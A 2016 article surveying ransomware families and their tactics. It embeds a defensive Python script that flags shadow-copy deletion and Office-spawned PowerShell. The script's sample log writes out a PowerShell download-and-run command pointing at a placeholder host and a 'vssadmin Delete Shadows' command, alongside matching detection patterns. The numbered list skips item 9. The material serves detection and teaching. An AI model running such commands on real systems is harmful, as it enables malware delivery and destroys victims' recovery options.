Worst 10 ransomware attacks 2016 – we name the Internet's nastiest extortion malware
Four years ago ransomware was a type of malware that had been kicking around for a decade to little effect. By 2016 it is suddenly everywhere, supplanting all other forms of malware as the number one menace. Two things changed its status: the rise of Bitcoin, a payment channel that is pseudonymous and hard to trace (though not untraceable), and the example of the FBI-themed police scareware that started to decline around 2012 but proved the principle that digital extortion can be profitable.
According to Symantec, 16 families were discovered in the decade to 2014, most spread on a very small scale, such as Cryzip, the first small-scale ransomware to affect the UK. In 2015, by spectacular contrast, 27 families were recorded in that year alone. This year the count is expected to reach as many as 60.
Ransomware is difficult to stop even on Windows computers running antivirus, although detection is improving. The most reliable defence is backup, but even backups come under attack if they are reachable from the infected PC: a mapped backup drive or a writable network share gets encrypted along with everything else, so at least one copy needs to be offline or otherwise not writable from the endpoint. Longer term, ransomware will inevitably fade, but extortion malware could move to the next tactic of threatening people with exposure for non-existent crimes such as downloading child abuse images. With more SMEs being affected than ever before, this threat has a way to run yet.
1. CryptoLocker – where ransomware took off
CryptoLocker is long gone (taken down by Operation Tovar in 2014) but it deserves its infamy because its heyday in 2013 proved to cybercriminals how profitable ransomware could be. It was supplanted by the equally vicious CryptoWall, which remains a headache to this day on systems not running updated AV or endpoint security. Technically CryptoLocker is a long way behind the current state of the art, but it never needed to be. Recovery? It’s dead, Jim.
2. Locky – well engineered, ruthless, clever
The work of the criminals behind the Dridex botnet, Locky is as bad as ransomware gets. Its creators seem to have thought of everything: it encrypts a wide range of data files, including Bitcoin wallet files, and deletes Windows Volume Shadow Copy Service (VSS) snapshots so that users cannot restore previous versions from them. It also reaches out to attached network shares and even other PCs and servers. It uses strong encryption and has claimed several high-profile victims. Recovery? No.
3. Crysis - Locky copycat with big ambitions
First detected by ESET in early 2016, Crysis styles itself on Locky: it deletes shadow copies and encrypts every file it can find, in some cases including system files. This rather odd behaviour means the infected PC can become inoperable. It also tries to elevate its privileges to administrator level using whatever logins it can harvest, and steals files, including user credentials. It targets VMware virtual machines too. Recovery? ESET has a decryptor for early versions.
4. zCrypt – ransomware that behaves like a virus
zCrypt tries the unusual technique of spreading like a virus, via removable media. This means it doesn’t rely solely on malicious emails to find victims: it copies itself to USB sticks along with a custom autorun.inf so that it executes automatically when the stick is plugged into a second machine (a trick that only works where AutoRun for removable drives has not been disabled, which has been the default since Windows 7). Instead of encrypting every file it can find in one pass, it watches important directories and encrypts files as they are changed. It scrambles the original contents first, so the plaintext cannot be recovered.
5. PowerWare – PowerShell hijacker
Discovered by security firm Carbon Black, this one is interesting because it targets businesses through Microsoft Word and the PowerShell scripting environment. Its innovation is that, after tempting the user to enable macros in a booby-trapped Word attachment, it runs fileless: the macro launches PowerShell, which downloads the malicious script and runs it in memory, and that script does the encrypting. Writing no executable to disk makes its activity harder for file-based antivirus to detect. Recovery? Possible, says Carbon Black.
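Two of the behaviours described above are easy to spot in process-creation telemetry: the shadow-copy deletion that Locky and Crysis perform before encrypting, and the Word-spawned PowerShell download cradle that PowerWare uses to stay fileless. The script below is an added example written for this page (not code from Carbon Black, ESET or any vendor) that runs those two checks over a handful of constructed log lines; the line format is modelled on Sysmon Event ID 1 field names (ParentImage, Image, CommandLine), the events and the host name example.invalid are made up, and the regexes are starting points rather than a complete rule set.

```python
import re
from dataclasses import dataclass

# Constructed sample of process-creation events, one per line, using Sysmon
# Event ID 1 field names. Not real telemetry; the URL uses the reserved
# .invalid TLD so it never resolves.
SAMPLE_LOG = r'''
ParentImage="C:\Windows\explorer.exe" Image="C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" CommandLine="WINWORD.EXE /n invoice.docm"
ParentImage="C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/fixed.ps1')"
ParentImage="C:\Users\alice\AppData\Local\Temp\dropper.exe" Image="C:\Windows\System32\vssadmin.exe" CommandLine="vssadmin.exe Delete Shadows /All /Quiet"
ParentImage="C:\Windows\System32\cmd.exe" Image="C:\Windows\System32\vssadmin.exe" CommandLine="vssadmin.exe list shadows"
ParentImage="C:\Windows\System32\svchost.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -File C:\scripts\backup.ps1"
'''.strip().splitlines()


@dataclass
class ProcEvent:
    parent: str    # ParentImage: the process that spawned this one
    image: str     # Image: full path of the new process
    cmdline: str   # CommandLine: the full command line


# key="value" pairs as written in the sample lines
FIELD = re.compile(r'(\w+)="([^"]*)"')

# Shadow copy deletion, done by Locky and Crysis so that Windows' Previous
# Versions feature cannot restore files after encryption.
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows"
    r"|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)

# Download-and-run cradles and the switches that usually accompany them;
# this is the shape of the PowerShell command a PowerWare-style macro runs.
PS_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b", re.I)

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def parse_event(line: str) -> ProcEvent:
    f = dict(FIELD.findall(line))
    return ProcEvent(f.get("ParentImage", ""), f.get("Image", ""),
                     f.get("CommandLine", ""))


def basename(path: str) -> str:
    # Lower-cased file name, tolerant of either path separator
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the names of the rules this event trips (empty if none)."""
    hits = []
    if SHADOW_DELETE.search(ev.cmdline):
        hits.append("shadow_copy_deletion")
    if basename(ev.image) in POWERSHELL:
        # An Office application launching PowerShell is suspicious on its own;
        # a download cradle in the command line makes it much more so.
        if basename(ev.parent) in OFFICE_APPS:
            hits.append("office_spawned_powershell")
        if PS_CRADLE.search(ev.cmdline):
            hits.append("powershell_download_cradle")
    return hits


def scan(lines) -> list:
    """Return [(line_index, [rule, ...]), ...] for every line that trips a rule."""
    findings = []
    for i, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(hits)}")
```

On the sample data only the Word-spawned cradle (line 1) and the `Delete Shadows` call from an unknown dropper (line 2) fire; `vssadmin list shadows` and a scheduled PowerShell backup script do not. In production the shadow-copy rule needs tuning by parent process, because legitimate backup agents also delete old snapshots, and the cradle rule should be paired with script-block logging, since a fileless payload leaves nothing on disk for antivirus to scan.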
6. Petya – attack the PC too
Ransomware usually encrypts files, but Petya’s target is the system itself. Its first act is to overwrite the Master Boot Record (MBR) and force a blue-screen crash. When the user reboots, instead of Windows they see a skull-and-crossbones splash screen with the ransom demand. In effect it holds the entire system hostage: the fake CHKDSK pass it runs on reboot is actually encrypting the NTFS Master File Table, which makes every file on the disk inaccessible even though the file contents themselves are left untouched. Recovery? Possible.
7. HydraCrypt – ransomware can be beaten
An offshoot of the CrypBoss ransomware, HydraCrypt is notable for having been pushed by the highly active Angler exploit kit, which suddenly and mysteriously disappeared in June 2016. It is perhaps best known for the battle between its creators and Emsisoft researcher Fabian Wosar. So far Wosar is winning hands down, having released decryptors for successive versions of the family. Recovery? Yes.
8. Cerber – ransomware-as-a-service
Cerber is one of a new breed of what appear to be ransomware-as-a-service operations, where the malware is rented out to affiliates who handle distribution. It encrypts files, of course, but not on machines in Russia or former Soviet republics, which is a strong hint about its origin. Once a PC is infected it throws up a fake Windows system alert and forces a reboot before starting its encryption routine. Rubbing it in, Cerber even makes the PC speak its ransom demand through Windows text-to-speech in case the victim doesn’t notice the dropped text files. Recovery? None known.
10. CryptoWall – it’s everywhere
Alongside Locky and Cerber, CryptoWall remains one of the most common ransomware threats. Produced in several versions since at least 2014, with version 4.0 distributed since late 2015 via the Angler exploit kit, CryptoWall feels like a mature piece of malware, right down to its persistence mechanisms and process injection. Little things stand out, such as the way it renames every encrypted file to a unique random name, which makes it harder to gauge the extent of the damage. Cisco found that the latest version terminates itself if it detects that it is running in a virtual machine, a check intended to frustrate sandbox analysis. Recovery? No.